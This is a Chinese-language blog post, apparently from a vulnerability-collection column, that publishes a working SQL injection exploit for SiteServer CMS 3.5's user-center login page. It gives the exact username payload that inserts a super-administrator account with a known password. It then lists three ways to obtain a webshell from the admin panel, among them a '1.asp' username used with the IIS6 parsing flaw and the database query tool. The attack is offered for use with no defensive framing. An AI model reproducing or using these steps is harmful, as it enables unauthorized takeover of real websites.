SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

最新推荐文章于 2022-11-02 18:41:00 发布
最新推荐文章于 2022-11-02 18:41:00 发布
阅读量2.6k 收藏 2
点赞数
分类专栏: 漏洞收集 文章标签: SiteServer
经测试秒杀最新的3.5版
stieserver官网:www.siteserver.cn
 
EXP:
 
直接访问UserCenter/login.aspx
 
用户名处输入:
 
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
 
 
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。 之后再访问后台SiteServer/login.aspx用插入的用户登陆。
后台拿webshell的三种方法:
 
一、
 
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
 
二、
 
成员权限-》添加用户-》用户名为:1.asp
 
http://127.0.0.1/usercenter/ 
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
 
(ps:后台添加用户时不会验证是否含有非法字符)
 
三、
 
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称,WEB路径
 
系统工具-》数据库工具-》SQL语句查询
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
 
7禧
关注
专栏目录
ASP.NET 中实现不同角色的用户使用不同登录界面的方法
Yao,Mane
04-24 1万+
很多用户在开发 ASP.NET 应用程序时都有这样的需求:管理员角色的账户使用管理员的登录界面进行登录,普通用户角色的账户使用普通用户的登录界面进行登录。由于ASP.NET的web.config里只能使用一个 authentication mode="Forms" 节点,所以,要实现不同用户采用不同的登录界面,一个办法就是创建一个管理员专用的虚拟目录,并设置为应用程序来实现。下面介绍另外一种采用重
审计一套CMS中的SQL注入
weixin_30790841的博客
08-07 380
漏洞分为系统漏洞和应用漏洞,系统漏洞以二进制漏洞为代表,其挖掘难度较高需要对反汇编和操作系统原理深入理解,而除了系统漏洞以外还有一些应用漏洞,包括不限MySQL,Apache,为代表的Web漏洞,这里我们就挖掘PHP代码层面的漏洞。 漏洞的挖掘也分为,点对点挖掘漏洞,和分散式挖掘漏洞,这我们主要使用点对点挖掘,在挖掘是我们需要找一些关键字,漏洞本身就是两个条件,可控的函数,和可控的变量...
sql注入系统命令 linux,SiteServer 3.4.4最新SQL注入0day
weixin_36134015的博客
05-16 223
这几天在看一个站的时候发现了这个CMS,网上公布了一些漏洞,没说明具体版本,但在我在3.4.4上实际测试的时候发现是无效的,为此专门去官网下了一份最新版,看了一下,发现了一些很搞笑的问题。简介siteserver:本文测试的版本是:SiteServer系列产品最新版本: 3.4.4 正式版 (2011年7月18日发布)下载地址:http://www.siteserver.cn/download客户...
SiteServer 3.4.4 逻辑漏洞导致SQL注入及修复方法
收集盒 Book box
11-18 1270
今天特别发现SiteServe CMS( 3.4.4 )网站根目录多了一个asp文件,我就意识网站可以被挂马了!马上排查,终于在后台发现多了一个blue用户名的超级管理员。我猜想可能是SiteServe CMS系统有漏洞,上网一查,果然把到一堆“SiteServer 3.4.4 逻辑漏洞导致SQL注入”的文章。 ----------------------------------------
siteserver 忘记管理员账号密码怎么办
hyb3280660的专栏
09-14 795
siteserver 忘记管理员账号密码怎么办 打开数据库,找到siteServer数据表:siteserver_Administrator,如下图所示: 把Password字段改成你需要设置的明文密码,把PasswordFormat字段值改成Clear,保存后,重新打开网站后台即可使用此账号密码登录后台,SiteServer程序会自动理你刚才添加的密码。 ...
学习笔记-B/S - Exploits
人饭子的博客
11-02 4万+
B/S - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 各类论坛/CMS框架 AEM 74CMS dedeCMS Discuz Discuz Discuz!ML Drupal ECshop Fastadmin Laravel jeecg jeewms Joomla Maccms MetIn...
ASP.NET源码——[CMS程序]SiteServer CMS 3.3.7 SQL版.zip
10-08
SiteServer CMS 3.3.7 SQL版是一款基于ASP.NET技术构建的内容管理系统(CMS),它为企业级网站开发提供了强大的功能和灵活的定制性。这款源码的发布旨在帮助开发者理解和学习如何利用ASP.NET来构建类似的应用,同时...
SiteServer CMS 6.15.51 安装包
05-01
SiteServer CMS是中国.NET平台CMS系统创始者,同时也是一款开源免费的企业级CMS系统,SiteServer CMS是.NET平台下最强大的企业级开源免费CMS内容管理系统和网站群系统,能以最低的成本、最少的人力投入在最短的时间...
SiteServer CMS v4.1.1601
12-06
SiteServer CMS 是定位于中高端市场的CMS内容管理系统,能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大的网站平台。 SiteServer CMS 是基于微软.NET 平台开发的网站内容管理...
ASP.NET源码——[CMS程序]SiteServer CMS 3.3.7 ACC版.zip
10-08
SiteServer CMS 3.3.7 ACC版是一个基于ASP.NET技术构建的内容管理系统(CMS),它为企业级网站提供了全面的建站、管理和服务解决方案。这款CMS系统以其高效、稳定和易于扩展的特点,在行业内受到广泛认可。从提供的...
ASP.NET源码——[CMS程序]SiteServer CMS v2.6.0 SQL版.zip
10-08
**ASP.NET 源码分析:SiteServer CMS v2.6.0 SQL版** ASP.NET 是微软公司开发的一种Web应用程序框架,它允许开发者使用.NET Framework和C#、VB.NET等语言构建高性能、安全且可扩展的网站应用。SiteServer CMS(内容...
ASP.Net之使用Cookie和Session实现自动登录
松一160
06-30 5301
一、UserLogin.aspx代码 window.onload = function () { var validateCode = document.getElementById("validateCode"); validateCode.onclick = function () {
内网渗透思路学习——靶场实战——暗月项目七
qq_45612828的博客
08-17 7291
内网渗透思路学习——靶场实战——暗月项目七。学习一下内网渗透中的一些攻击思路和技巧(比如常见的横向、纵向渗透、代理穿透、提权、免杀等等)
3 爬虫 模拟登录 异步爬虫
健浩的博客
07-06 613
爬虫 1 模拟登录 1.1 模拟登录古诗文网 古诗文网登陆页面:https://so.gushiwen.org/user/login.aspx?from=http://so.gushiwen.org/user/collect.aspx 点击登录按钮的请求参数 Request URL: https://so.gushiwen.org/user/login.aspx?from=http://so.gushiwen.org/user/collect.aspx Request Method: POST Form
SiteServer CMS 0Day
p656456564545的专栏
01-09 2816
经测试秒杀最新的3.5版   EXP: 直接访问UserCenter/login.aspx 用户名输入: 123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypte
requests实现简单的验证登录以及登陆后获取想要的页面内容--模板
執筆冩回憶
08-17 3219
#!/usr/bin/env python # coding=utf-8 # 简单的验证登录以及登陆后获取想要的页面内容 import requests from lxml import etree # 这个是网站在登录的时候验证密码的界面,一般不是登录的界面,需要抓包获取到 post_url = "https://pos.XXXX.com/j_security_check" username...
SiteServer XSS 后台绕过登陆 遍历文件漏洞
收集盒 Book box
05-16 1928
首先注入 这个比较关键 用户登录后会产生3个COOKIE 一个是SESSIONID 一个是 AUTH (这个是啥,随便改就可以的) 一个是记录用户名的 问题就出在这里了,大部分的功能都是设计到用户名而且都是从COOKIE里查看的 所以注入就产生了 在 用户名上 登录后 修改COOKIE 刷新下 注入出现了 没有过滤COOKIE的值 导致注入 论坛XSS 由于以上漏洞
0Day 密码重置dede阿帕奇强制安装
weixin_30337157的博客
07-09 82
CMS:siteserver 关键词: inurl:siteserver/login.aspx inurl:siteserver/forgetPassword.aspx 操作:F12 禁用JS getshell:添加上传文件格式,上次一句话或者大马 ===================================== dedecms 阿帕奇安装漏洞环境:阿帕奇抓包改url...
login.aspx中使用设计登陆界面 并 写usp_Login存储过程
段琳琳
11-11 5836
--写usp_Login存储过程,参数有三个,其中第三个参数为output,用来返回登陆是否成功,成功1,失败0( @uname varchar(50),  @password varchar(50),  @result bit output) use UserDB1 select * from T_Users create proc usp_Login @uname varchar(50
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值